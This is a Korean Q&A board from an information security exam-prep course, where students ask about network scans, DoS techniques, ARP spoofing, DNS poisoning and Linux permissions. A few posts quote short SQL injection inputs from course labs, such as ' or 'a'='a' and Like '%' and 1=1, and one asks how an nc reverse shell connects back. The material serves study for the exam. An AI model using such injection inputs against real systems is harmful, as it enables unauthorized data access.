리눅스 터미널 chown 질문

which chown으로 봤을 때 chown의 퍼미션이 755인데도 일반계정으로 chown가 실행이 안됩니다. 왜 그런지 이유를 모르겠습니다. sudo나 su 없이 일반 사용자가 chown 사용하게 하려면 어느 설정을 건드려야 하나요? (터미널 사진을 찍으려다보니 useradd도 같은 상황인 것을 알게 되었습니다.)

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이창모 2021-04-02
미답변

setuid가 설정되어 있는데 왜 검색 결과에는 나오지 않는건가요?

sgid.out는 setgid가 설정되어 있고, sugid.out는 setuid, setgid가 설정되어 있고, suid.out는 setuid만 설정되어 있는 것으로 첨부파일을 보면 확인하실 수 있습니다. 근데 왜 find . -perm 4000를 검색했을 때, setuid만 설정되어 있는 suid.out가 출력되어야 한다고 생각하는데 왜 검색되지 않나요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김지연 2021-03-02
미답변

다른분들의 문의가 빗발치는 바쁘신 와중에 개행처리 관련 문의 드립니다.

다른분들의 문의가 빗발치는 바쁘신 와중에 문의 드립니다. Slow Header Dos 나 HTTP응답 분할 취약점에서 개행처리로인한 문제가 발생되는 것으로 알고있는데 제가 공부한 바로는 헤더의 각 필드는 이미 개행으로 분리가 되는걸로 알고있거든요 1.slowloris에서는 왜 빈라인(개행)를 하지 않아 발생한다도 있지만 단순 개행처리만 하지 않아 발생한다라는 문장도 많이 보이던데 왜 이렇게 표현이 될 수 있는지 궁금합니다. 2. 응답분할취약점에서도 같은 맥락으로 헤더는 어차피 개행으로 분리가되는데 set-cookie이후 Content-Length에 개행처리를 해서 응답이 두개가 되었다는게 저는 조금 이해가 안되서요 .. (그냥 요청파라미터 값을 서버에서 set-cookie되거나 할때 나타나는 버그 같은 건가요?) 제가 잘못알고 있는게 있으면 혼쭐내주시면 감사드리겠습니다..

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-12-07
미답변

TCP Port Scan

올해 7.11일에 시행된 9급 국가직 공무원 네트워크보안 문제 9번(RFC 793을 준수하는 시스템의 닫힌 포트에 대해 TCP FIN, NULL, Xmas 스캔 시 시스템의 반응)을 푸는데 보기에 RST, RST + ACK가 있었으나 정답은 RST로 처리된것을 확인했습니다. 또한 유튜브에 해당 시험의 해설강의가 올라와있길래 보는 도중 Xmas Scan이 모든 Flags를 1로 설정한다고 표시한다 라고 하고 있었습니다. 제가 알고 있는건 Xmas는 URG, PSH, FIN Flags의 설정이고 위의 FIN, NULL, Xmas 스캔은 ACK Flag가 포함되어있지 않아 RST + ACK Flags가 설정된 응답을 보낸다는것입니다. 잘못 알고있는것일수도 있어 nmap 홈페이지와 RFC793 문서를 찾아봤지만 Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.(Nmap) If the ACK bit is off, sequence number zero is used, 라고 표현되어있습니다. 그렇다면 해설강의와 공무원 네트워크보안의 문제에 대한 답이 틀린건가요? 아니면 강의 찍은 후에 변경사항이 생겨 Xmas Scan의 방법과 Stelth Scan의 응답이 바뀐건가요? 해당 해설강의의 주소는 https://www.youtube.com/watch?v=yNWcVvWyG4E&t=1162s 입니다. 캡처한 Flags Set은 첨부파일로 올려두겠습니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임도경 2020-12-06
미답변

46. 046.네트워크기본학습_16 /p196~200 질문드립니다.

안녕하세요 강사님. 항상 좋은 강의 감사하게 듣고있습니다! promiscuous모드는 더미 스위치 환경에서 모든 포트에 프레임을 전달하지만, NIC에서 나의 맥주소가 아니면 프레임을 버리기 때문에 스니핑 하기 위해 설정하는 모드라고 이해를 하고 있습니다. 그런데 만약에 L2스위치의 모니터링 포트에 리눅스 분석서버가 연결 되었다고 한다면, promiscuous모드를 설정하는게 맞는지 안하는게 맞는지 궁금합니다. 이론상으로 L2스위치에서는 모든 포트로 패킷을 전달하지 않기 때문에 패킷을 분석하려고 모니터링 포트를 연결 하는 것인데, 모니터링 포트를 통해서 통신하는 패킷을 미러링하여 리눅스 분석서버로 전달해준다고 하여도, 리눅스 NIC 입장에서는 "나한테 온 패킷이 아니구나"버리기 때문에 더미 스위치 환경처럼 promiscuous모드를 설저하는게 맞다고 생각이 들긴합니다만 맞는지 궁금하네요....

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임승훈 2020-12-03
답변완료

inetd standalone방식

안녕하세요 문의드립니다 문제편에서 tcpwraaper에서 접근제어를 할때 telnet은 in.telnet ssh는 sshd로 표현을 하던데 inetd 방식과 stanalone 방식에 따라 서비스가 나뉘는건가요? 예를들어 ssh는 무조건 sshd 이렇게요.. 난해한질문에 답변부탁드립니당

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-30
답변완료

39. 039.네트워크기본학습_09 /p168~172 질문드립니다.

안녕하세요 강사님. 해당 수업의 IP 라우팅 설명 중 "목적지 주소와 자신의 주소가 서로 동일 한 경우 목적지가 자신의 호스트이므로 상위 계층으로 데이터를 전달한다." 위의 설명이 루프백인 경우에는 데이터를 전달 할 필요가 없으니, 상위 계층으로 전달 하는 것이고, 만약 목적지 주소가 자신의 호스트주소가 아니라면 2계층으로 전달하고 2계층은 1계층으로 전달한다고 생각하면 될까요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임승훈 2020-11-28
답변완료

rotbots.txt 질문

안녕하세요 교수님 항상 친절한 답변 감사드립니다!!. 다름이 아니라 robots.txt 에 대해 궁금한게 있어서 질문드립니다! UTM ESM SIEM 질문 이전에 올렸던 질문인데 답이 아직 안달려서요 ㅜㅜ. 1. 만약 User-agent: * Disallow: /home 이런 robots.txt 파일이 있다면 모든 검색로봇에 대해 home 디렉터리 접근을 차단하고 있다는것을 알수있는데 그럼 그외 다른 디렉토리는 접근할수 있나요? 예를들어 /board 나 /home/index.php 같이 저 robots.txt 파일에 명시되어 있지 않은 페이지에 대해서는 디폴트로 어떻게 처리하는지 알고싶습니다.. 2. naver.com/robots.txt 파일이 User-agent: * Disallow: / Allow : /$ 이거인데 어떻게 해석을 하면 좋을까요?.. Diallow: / 이니깐 모든 디렉터리에 대한 접근은 차단이고 Allow : /$ 이거는 어떻게 해석해야될까요??? ※ Allow: /$ 가 아니고 Allow : /$ 이렇게 메모장으로 저장이 되어있습니다. 일부로 Allow의 문법을 틀리게 적은걸까요?? 만약 문법을 틀리게 적으면 어떤 에러가 나나요? 아니면 주석처리한것 처럼 그냥 무시를 하나요?? 첨부파일로 naver.com/robots.txt 파일 보내드립니다!!! 자꾸 쓸데없는 질문을 한것같아 죄송합니다 ㅜㅜ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박하람 2020-11-27
답변완료

SSL/TLS 관련 문의

책 문제편 290번을 푸는 도중 네트워크 계층과 어플리케이션 계층 사이에 위치해 데이터 보안 서비스를 제공하는 프로토콜이 SSL이라고 답이 적혀져 있습니다. 하지만 이론편의 SSL/TLS는 전송계층과 어플리케이션 계층 사이에서 동작한다고 나와있는데요 어떤것이 정확한건가요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임도경 2020-11-27
답변완료

URL 과 URI

GET과같은 요청방식을 설명할 때 URL 이나 URI 둘다 맞는 표현인가요? URI 안에 URL 이 포함되어있다고 간단히만 알고있는데 URL을 써야하는 답에 URI를 써도 의미가 어느정도 맞나요?? 답변이 곤란하시겠지만 ... 어차피 구분해서 외울꺼긴한데.. 강사님의견이 궁금하여 문의드립니다. 감사합니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-25
답변완료

ARP 스푸핑 질문드립니다!

강사님 안녕하세요! 033.네트워크기본학습_03 /p150~151 강의 학습 중 궁금한 부분이 생겨서 질문드립니다. A(희생자),B(공격자),C(희생자) 3개의 호스트가 있다고 가정 하였을 때, B공격자가 A,C의 ARP Cache Table도 변조 한 상태이고 A는 C라고 인지하여 B에게 패킷 보냈다고 한다면, 어떻게 IP Forwad가 되는것인지 궁금합니다... B(공격자)기준 A(희생자)의 패킷을 받게 되면, 이더넷 프레임 목적지 맥주소는 B(공격자) 맥주소 일텐데 어떻게 목적지가 C라고 판단하면 C로 포워딩을 해줄 수가 있는건가요? IP프로토콜에 대한 이해가 아직 많이 부족한거같습니다.ㅠㅠ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임승훈 2020-11-25
답변완료

UTM ESM SIEM

안녕하세요 교수님 보안장비에 대해서 궁금한점이 있습니다. 1. UTM은 하나의 장비에 여러가지 보안 기능을 탑재한 장비라고 하셨는데 그럼 만약 'A' 라는 UTM 장비가 있으면 이 A에서 방화벽, IPS, IDS, VPN 등등의 역할을 하는것인가요?? 각 보안장비들의 로그들을 취합해서 보여주는게아니라 'A' 장비 혼자 다양한 보안장비의 기능을 하는건가요?? 2. ESM이랑 SIEM 차이점을 알고싶습니다. 둘다 다양한 보안장비들의 로그 들을 취합해서 보여주는 모니터링 장비가 맞나요?? 차이점을 알고싶습니다. 아니면 보통 구분없이 쓰나요??.. 제가 근무하는 사이트에선 Splunk라는 장비를 SIEM이라고 하는데 맞나요?? 3. AD(Active Directory)에 대해서 간단하게 설명해주실수 있나요?? 구글링해도 '여러 사용자들의 계정 정보나 정책들을 가지고 있는 데이터베이스' 정도로 나오는데 NAC이랑 조금 헷갈립니다 ㅜ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박하람 2020-11-25
답변완료

90강 내용중 질문있습니다

실습해주신 부분에 보면 /var/www/html/admin/디렉토리 하위에 admin.php 와 agsmgr.php 페이지를 모두 갖고 있는데왜 agsmgr.php로만 인식되나요??

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-11-23
답변완료

robots.txt 질문

안녕하세요 교수님 다름이 아니라 robots.txt 에 대해 궁금한게 있습니다. 1. 만약 User-agent: * Disallow: /home 이런 robots.txt 파일이 있다면 모든 검색로봇에 대해 home 디렉터리 접근을 차단하고 있다는것을 알수있는데 그럼 그외 다른 디렉토리는 접근할수 있나요? 예를들어 /board 나 /home/index.php 같이 저 robots.txt 파일에 명시되어 있지 않은 페이지에 대해서는 디폴트로 어떻게 처리하는지 알고싶습니다.. 2. naver.com/robots.txt 파일이 User-agent: * Disallow: / Allow : /$ 이거인데 어떻게 해석을 하면 좋을까요?.. Diallow: / 이니깐 모든 디렉터리에 대한 접근은 차단이고 Allow : /$ 이거는 어떻게 해석해야될까요??? ※ Allow: /$ 가 아니고 Allow : /$ 이렇게 메모장으로 저장이 되어있습니다. 일부로 Allow의 문법을 틀리게 적은걸까요?? 만약 문법을 틀리게 적으면 어떤 에러가 나나요? 아니면 주석처리한것 처럼 그냥 무시를 하나요?? 자꾸 쓸데없는 질문을 한것같아 죄송합니다 ㅜㅜ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박하람 2020-11-22
답변완료

세션 쿠키와 세션 방식은 다른거죠?

안녕하세요 문의드리는 내용은 2020년 보안기사 책의 p.332 페이지입니다. 쿠키의 세션 쿠키와 세션 방식은 다른건가요?? 뒤에 XSS 등에서 탈취할 정보 중 쿠키(세션쿠키를) 탈취한다 라고 말씀해주셨는데 헷깔려서요;;

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-11-20
답변완료

감사합니다 교수님

궁금한게 있습니다. 1 TCP-Xmas 스캔 공격이 UPF 플래그가 설정된 패킷을 보내는 걸로 알고있는데 어떤 블로그에서는 X-mas 공격을 '모든 TCP 플래그가 설정되어있는 공격', '여러개의 TCP 플래그가 설정되어 있는 패킷을 말하며 주로 UPF 플래그가 설정되어있는 패킷이 일반적이다) 이렇게 설명하는데 정확한 TCP X-mas 스캔 공격의 정의는 무엇인가요?? 2. SQL 인젝션 공격에서 ~ Like '%' and 1=1 이라는 공격구문을 실행하여 DB의 모든행(게시판 내용)을 출력해주는 실습이 있었는데 ~Like '*' and 1=1 이렇게 해도 되는건가요?? '%'는 1개의 문자만 표현하는걸로 알고있어서요... 또 ~ Like '%' and 1=1 과 ~ Like '%' or 1=1 은 서로 다른 결과값을 나타내나요?? 둘다 결국에는 모든행(모든 게시판 내용)을 출력해줄것 같은데 결과가 궁금해서요 ㅜㅜㅜ ※교수님 강의 매우 매우 재밌게 잘 듣고있습니다. 하나하나 실습해주시는것도 고맙고 비전공자들을 이해하기 위해 노력하시는 모습때문에 더 열심히 공부해야겠다는 생각이 듭니다. 지금 비록 관제업무를 하고있지만 수박 겉핥기 식의 지식이 많았는데 교수님 강의를 듣고 평소에 애매하게 알고있던거나 궁금했던것을 많이 깨우칠수 있어서 좋았습니다. 감사합니다 교수님 지금 CSRF 공격까지 강의를 들었는데 DOM XSS 공격을 제외하고는 모두다 이해가 잘 되었습니다,(DOM XSS는 제가 머리가 나빠서 구글링을 통해 좀더 공부를 해야 될것같습니다.) 보안기사 따고 CISA 나 CISSP 또는 CCNA,CCNP 를 따려고 했습니다.(보안기사와 중복되는 내용이 많아서..) 근데 교수님 말 듣고는 웹 프로그래밍 언어를 먼저 공부해야겟다는 생각이 들었습니다. html, CSS, JS, PHP 이런 스크립트나 언어는 웹 보안쪽 일을할떄 필수더라구요 ㅜㅜ 맨날 구글링 하는것도 일이고.. 한번 마음먹고 공부하는게 좋을것같네요 ㅎㅎ 항상 감사합니다 교수님. 강의 기간이 만료되면 Q&A를 쓸수 있을지 모르겟지만 꼭 합격 후기를 남기고 싶습니다 감사합니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박하람 2020-11-19
답변완료

난독화 문의

1. 10진수 난독화에서 eval()이라는 함수기 악성코드(자바스크립트코드)가 맞는지 검증한 후 실행한다고나와있는데 이 검증과정이 왜필요한건가요 ?? ....아니면그냥 난독화별로어떻게 생겼는지만 알아두고 넘어가면되는것인지.... 쓰다보니 두서없게 질문드리는데 양해부탁드립니다..

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-18
답변완료

결제 금액 문의

재수강이나 연장신청은 금액이 어떻게 되나요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

최강 2020-11-17
답변완료

문의

안녕하세요 실기이론책 p538 맨 위 그림에 mv 명령어를 이용한 파일변경 예시가있는데 인강에서는 변경될 파일명에 경로까지 지정해주고 책에서는 딱히 되어있지않은데 자동으로 앞에있는원본 파일경로를 참고하는거인가요??

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-17
답변완료

실기 인강 범위

131~133강 암호학 / 134 ~ 135 시큐어 코딩 특강부분도 정보보안기사 실기 범위 포함인건가요?? 암호학 부분은 출제 비중이 높지 않다 라고 언급하신 부분이 있어 문의 드립니다

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김태환 2020-11-17
답변완료

2020년 실기 69강 내용 중 질문이 있습니다

DNS 캐시 포이즈닝의 대응책에 나와있는 것 중에 2번 항목이 [ 도메인 관리용 DNS 서버(Authoritative 네임서버)는 재귀적 질의(Recursive 쿼리)를 허용하지 않도록 설정하고 ~~] 라는 문구에서 말씀하시는 Authoritative 네임 서버 = 그림 7.1.3 의 algisa.com DNS서버인가요? 아니면, Recursive DNS 서버(캐시서버)인가요? 말씀하시는 Authoritative 네임 서버 가 = 그림 7.1.3 의 algisa.com DNS서버라고 한다면, 사용자가 DNS 질의를 했을때에 Recursive DNS 서버(캐시서버)의 캐시에 없다면 답변을 해주지 않는건가요?? Recursive DNS 서버(캐시서버)는 ISP 업체에서 사용하는 공통의 DNS 서버인데 이럴경우 응답을 못해주는것 아닌가요??? 헷깔립니다ㅠ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-11-16
답변완료

산업기사 문의

안녕하세여 2020 실기 P443 보안서버 구축의 법적근거부분도 상식적으로 알면좋겠지만 산업기사 바운더리에 포함되나요??

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-16
답변완료

2020년 실기 68강 내용 중 질문이 있습니다

dig 실습 보여주는 장면을 실습해보는데 dig @168.126.63.1 www.google.com ns와 dig @168.126.63.1 google.com ns 의 차이점을 잘 모르겠는데 결과가 달라서요ㅜ 설명 해주세요.... 왜 강의하실 때 www을 빼고 하셨는지...궁금해요

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-11-15
답변완료

sloworis

SLOW HTTP HEADER DOS 공격은 메소드 상관이 없나요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-13
답변완료

2020년 실기 44강 내용 중 질문 있습니다.

ACK 의 ack.num 값을 - 없는 상태로 보낼지 아니면 이전의 syn.num+데이터부의 길이 로 보낼지는 다음에 보낼 패킷이 있는지 없는지에 따라 달라 진다고 했는데 TCP Connection flag 인 URG,ACK,PSH,RST,SEQ, FIN 등에 따라 나눠지는건가요? 어떤걸 보고 다음에 패킷이 있는지 없는지 확인하나요

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-11-09
답변완료

산업기사

실기시험은 총 몇문제인가요,,, OT나 책에는 기사기준으로만 나온거같아서요

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-08
답변완료

정보보안산업기사 실기강의

정보보안산업기사 실기보려고 하는데 범위가 어디까지인가요?? 2020 실기시험대비 강의기준으로 몇강의까지 들어야되는지 확안부탁드려요

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2020-11-08
답변완료

world writable 파일 질문있습니다.

안녕하세요 교수님 강의 너무너무 잘듣고 있습니다. 감사합니다!! world writable 파일이 "모든 사용자(others)에게 쓰기 권한이 부여된 파일" 이라고 적혀있는데 여기서 말하는 모든사용자가 others를 말하는건가요??? 아니면 소유자,소유그룹,다른사용자 다 포함인가요 예를들어 r_xr_x_rwx 이런 파일을 world writable 파일이라고 하나요 아니면 소유자와 소유그룹,다른사용자 모드 w가 있는 rw_rw_rwx 이런 파일을 world writable 이라고하나요?? 중요한건 아닌것같지만 그냥 궁금해서 여쭈어봅니다 ㅠㅠㅠ 그리고 이건 여담인데 혹시 보안관제에 대해서는 어떻게 생각하시나요?... 현재 인포섹에서 보안관제 업무를 1년째 하고있는데 남들은 관제는 어디가서 보안했다고하면 안된다, 경력이 아니다 이런소리가 있어가지구요 ㅜㅜ 차후 목표는 취약점 진단과 모의해킹 업무를 하는것입니다... 감사합니다!!

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박하람 2020-10-30
답변완료

4 way handshake

1 .4 way handshake close과정에서 첫번째 fin + ack에서의 ack는 이전 전송된 Data에 의해 발생한거라고 이해했습니다. 하지만 lask_ack의 상태에서는 이전 fin + ack의 fin에 대한 ack를 전송하고 새로 받은 data가 없음에도 불구하고 불구하고 왜 다시 fin신호와 ack 신호를 함께 보내는지 이해가 잘 되지 않습니다. 2. 또한, 제가 직접 실습을 했을때엔 첫번째 close wait상태에서 ack를 전송하는 과정이 빠지고 fin+ack만 연속적으로 두번 나타났는데 왜 이런 상황이 발생했는지 궁금합니다. 3. 첫 fin+ack과정에서 이전 data에 의해 ack가 발생한다고 말씀하셨는데, 종료 이전에 마지막으로 받은 data에 대해 내용 없이 ack만 전송했다고 한다면 종료를 위한 fin flag만 설정해서 보내질 수도 있지 않나요? 그렇게 되어 해당 fin에 대한 ack를 보내고 마지막으로 서버가 종료하기 위한 fin을 보내고 클라이언트에서 해당 fin에 대한 ack를 보낸다 하면 결국 fin - ack - fin - ack가 정확한 상황이 될 수 있지 않나 궁금합니다 클라이언트로는 Ubuntu 18.04.2 LTS 버전을 이용했으며, 서버로는 CentOS release 6.10 (Final) 버전을 사용했습니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임도경 2020-10-24
답변완료

각각의 용어에 대한 질문

p71네트워크보안 보안쉘ssh 공부중에 질문이 있습니다 ssh sftp sshd 라는 용어가 있는데 각각의 차이와 정의를 정확하게 알고싶습니다 ㅠㅠ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김재연 2020-10-13
답변완료

2020년 실기 76강 내용 중 질문이 있습니다

76강 맨 마지막에 작성해주신 내용에 대한 질문이 있습니다. (상세 : 76강, 076.웹어플리케이션취약점_02/p352~355의 46분 13초 경) select id,pass from member where id='$id'; 일때 id 변수? 파라미터? 에 대한 답을 쓰는게 문제였습니다. 이때 설명해주신 답안 중에 DB에 상관없이 모두 허용되는것이 ~~id='' or 'a'='a'; 이라고 적어주셨는데 이게 DB에 상관없는 이유로 예측한 것이 1. 이전에 문제에서는 select id,pass from member where id='$id' and pass='$pass' 와 같은 상황에서 사용하여 # 또는 --과 같은 주석이 꼭 필요하였으나, 문제에서는 뒤에 and pass='$pass' 문구가 없으므로 바로 True 되어 넘어간다. 2. 맨 마지막에 적어준 ; 으로 인하여 select id,pass from member where id='' or 'a'='a';으로 문구가 실행되어 뒤에 and pass 같은 것들이 나온다고 하더라도 상관없이 True가 되는것이다.(?) 사실, 2번은 위에서 True 되었어도 뒤에 and pass='$pass'부분에서 에러가 나서 에러 문구를 화면에 뿌려줄것같긴해요..ㅎㅎ 어떤 요소로 True 되어 넘어가는지 잘 이해가 안되서 확실히 하고싶어서 연락드렸습니다. !추가 요청! 선생님 이전에 문의드렸던 38강 내용에 대한 답변을 볼수가없는데 어떤식으로 봐야하는지 설명해주세요 뭔가 첨부해주셨다고 하셨는데 제가 첨부했던 사진만 보이네요ㅠ 확인 부탁드립니다. 샘 댓글에 문의글을 또 올릴수있지 않아서 이렇게 쓰게 되었습니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-10-03
답변완료

38강 IP fragmentation 관련질문

ip 프로토콜은 비연결형 프로토콜로 연결 상태를 유지하기 않기 때문에 패킷 전송 순서를 보장하지 않는다고 알고있습니다. 3008바이트의 데이터를 보낼 때 ip단편화가 일어나는데 이것도 패킷 순서를 보장하지 않는다면 만약 마지막 단편(flag:0)이 먼저 오면 그 뒤에 오는 단편은 버리는 건가요? 무조건 순서대로 오는건가요? 강의에서는 순서대로 설명을 해주시는데 두개의 부분에 혼란이 와서 질문드립니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

윤소진 2020-09-12
답변완료

2020년 실기 38강 내용 중 질문이 있습니다

38강 내용이 IP프로토콜에 대한 내용입니다 설명 중 P.167 에서 (나) 동작방식의 실습을 보여주면서 보았던 Wireshark 내에서 가장 마지막 단편의 Total Length = 76로 표현되었고 교재의 마지막 단편 Total Length=68 로 차이가 있어서 언급하고 넘어가 주셨습니다. 이 부분에 이해가 안되는 내용이 있어서요 강의 내용 내의 설명으로는 PING 을 이용하여 테스트 하였기 때문에 ICMP의 헤더인 8 Byte가 추가되어 76로 표현되었다고 해주셨습니다 그러나, 마지막 부분에 강의 설명 인 IP 헤더 내 Protocol(8 byte) 는 상위 프로토콜을 식별하기 위한 프로토콜 번호를 저장하는 필드인데 이 필드는 그저 다음 프로토콜을 가르키는 번호를 저장하고 있을 뿐이고 ICMP는 IP보다 상위계층이라서 현재 그림내에 표현이 안되고 있는건가요? 즉, wireshark로 볼때는 7계층의 데이터를 표현하고 있으므로 icmp 헤더가 붙는 형식으로 표현되고 있다 라고 이해하면 될까요? 그림으로 이해하고 싶은데 잘 모르겠네요;;ㅜㅜ 첨부파일에 그림 그렸어요 확인 부탁드려요 ㅎㅎ(잘못된거면 고쳐 주시면 감사합니다)

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강훈구 2020-09-10
답변완료

윈도우 SRM의 Full Name은 무엇인가요?

안녕하세요. 강의 처음에 있는 윈도우 인증과정 주요요소 중에 SRM의 Full Name이 두가지로 기재가 되어 있어 문의를 드립니다. 1. Security Reference Monitor - Page 23 윈도우 인증과정 주요 서비스 SRM(Security Reference Monitory) 2. Service Reference Monitor - 그림 1.1.1 윈도우 인증 서비스 도표 하단 SRM(Service Reference Monitor) - Page 24 SRM(Service Reference Monitor) 서비스 기능 두가지 중 어떤것이 맞는 것인지? 아니면 두가지 모두 혼용해서 사용하는지 궁금합니다. 인터넷에서도 두가지 모두 나와 있어 더욱 헛갈려서 문의 드립니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이천연 2020-09-07
미답변

수강중인 보안기사 실기 132강 내용중..

132강 정보보호일반 특강 암호학 02 내용중 OFB에 대한 설명으로 암호화, 복호화 병렬처리가 가능하다 되있는데, 타사 책이나 인터넷을 찾아봐도 OFB 모드의 암복호화 병렬처리는 안된다고 되어있습니다. 강사님의 정확한 답변 부탁드립니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김윤호 2020-08-21
답변완료

안녕하세요. 정보보안기사(실기) 수강생입니다.

안녕하세요. 정보보안기사(실기) 수강생입니다. 강의에서 강사님이 vm으로 os설치해서 강의하셔서 저도 같이 실습해보고 싶습니다. 혹시 os들 배포자료가 있나요? 혹시 있다면 지인분 말을 들어보니 예전에는 카페에 올려두셨다고 하던데 제가 아무리 찾아도 못찾겠어서요. 어디에 업로드 하시는지 알려주세요.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김재민 2020-07-24
답변완료

tcp 4-way handshake 종료 과정 질문 드립니다.

정일영 교수님 안녕하세요. tcp 4way handshake 종료과정 문제풀이 중에 의문이 들어서 질문 드립니다. FIN_WAIT1 상태가 될려면 FIN+ACK 패킷을 먼저 보내야 되는걸로 알고 있는데요. 2020 실기 문제편 214번 문제보면 FIN 패킷을 보내면 FIN_WAIT1 상태가 된다고 나와 있습니다. 인터넷 검색해보니 4way-handshake 종료과정은 FIN을 보냈을떄 FIN_WAIT1 상태가 된다고 나와있습니다. 제가 실기 강의 들었을떄는 FIN+ACK 패킷을 보냈을떄 FIN_WAIT1 상태가 되었던걸로 기억하는데요. 2020 기사 이론편 186쪽 내용도 동일합니다. 답변 부탁드리겠습니다. 감사합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

성상우 2020-06-27
답변완료

문제편 p121 / 202번

안녕하십니까 정일영 교수님 이번 정보보안기사 필기를 합격하고 동회차 실기 합격을 위해 노력하고 있는 학생 전선아 입니다. 문제편을 푸는 도중 모르는 것이 생겨 Q&A 남깁니다. 첨부파일에 있는 문제에서 172.16.5.28이 왜 16개의 서브넷 마스크를 가지는지 모르겠습니다. 길어도 좋으니 설명해주시면 정말 감사하겠습니다 교수님,, 또한 서브넷 영역이 왜 172.16.5.16~172.16.5.31 인지도 같이 설명해주시면 감사하겠습니다

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

전선아 2020-06-24
답변완료

질문드려요

안녕하세요. 강의 처음 듣고 있는데요 교재 23페이지 윈도우 인증구조는 challenge&response 를 사용한다 했는데 다음으로 설명해주신 사전공격방법은 NTLMv2 을 크랙 하는걸 보여주셨잖아요 왜 아이디 및 패스워드 인증방식을 쓰나요 challenge&response방식을 안쓰고요

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

김동현 2020-06-21
답변완료

3강에 나오는 연습장 파일은 따로 받을 수 없나요??

3강에 나오는 개념 정리된 연습장 파일은 따로 받을 수 없나요??

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

강민수 2020-06-13
답변완료

리버스쉘 침해사고 시나리오

타겟 웹서버에서 nc프로그램을 커넥터로 동작시킨다고 하셨는데, 타겟 웹서버에 nc프로그램을 어떻게 설치하나요? 또, 타겟 웹서버의 nc커넥터가 공격자의 PC/서버에 어떻게 접속하나요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임소연 2020-06-09
답변완료

tcp fin,xmas,null 스캔

필기 수업 때는 포트가 닫혀있을 때 응답이 RST으로 온다고 알려주셨는데 실기 수업에서는 RST+ACK라고 하셔서요. 뭐가 맞는건가요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임소연 2020-06-04
답변완료

웹 사이트가 GET, POST 인지 확인 하는 방법?

특정 웺 사이트가 GET 방식인지, POST 방법으로 만들어진 페이지인지 확인하는 방법이 있을까요? 단순하게 URL만으로 구별을 할 수 있는건지 아니면 다른 방법이 있는건지 궁금합니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이민우 2020-05-31
답변완료

/etc/pam.d 설정 문의드립니다.

안녕하세요. 강의 중 /etc/pam.d/system-auth 파일 설정 중 패스워드 차단과, 규칙에 관한 설정은 ssh 접속시에는 적용이 안되고 telnet 접속 시에만 적용되는건지 궁금합니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이민우 2020-05-13
답변완료

http traffic 스니핑 관련

실습 내용을 보면 희생자의 PC or 취약한 서버 등에 프락시 tool (burp)을 설치하여 응답이나 요청 메시지를 캡쳐해서 강의를 해주셨는데요. 실제 해커들은 어떤 방법으로 (시나리오)웹 traffic을 스니핑 하게 되는지 궁금합니다. N/W 영역에서 스니핑은 보통 동일한 LAN 대역이나 NW 상일건데,, http는 보통 인터넷 구간 일건데요. 공부를 하다가 이 부분이 계속 궁금했습니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박용희 2020-05-09
답변완료

학습 기준시간을 초과했다고 나오면서 강의 수강이 안되네요

13강 학습 기준시간을 초과했다고 나오면서 강의 수강이 안되네요. 들을수 있도록 조치해 주세요

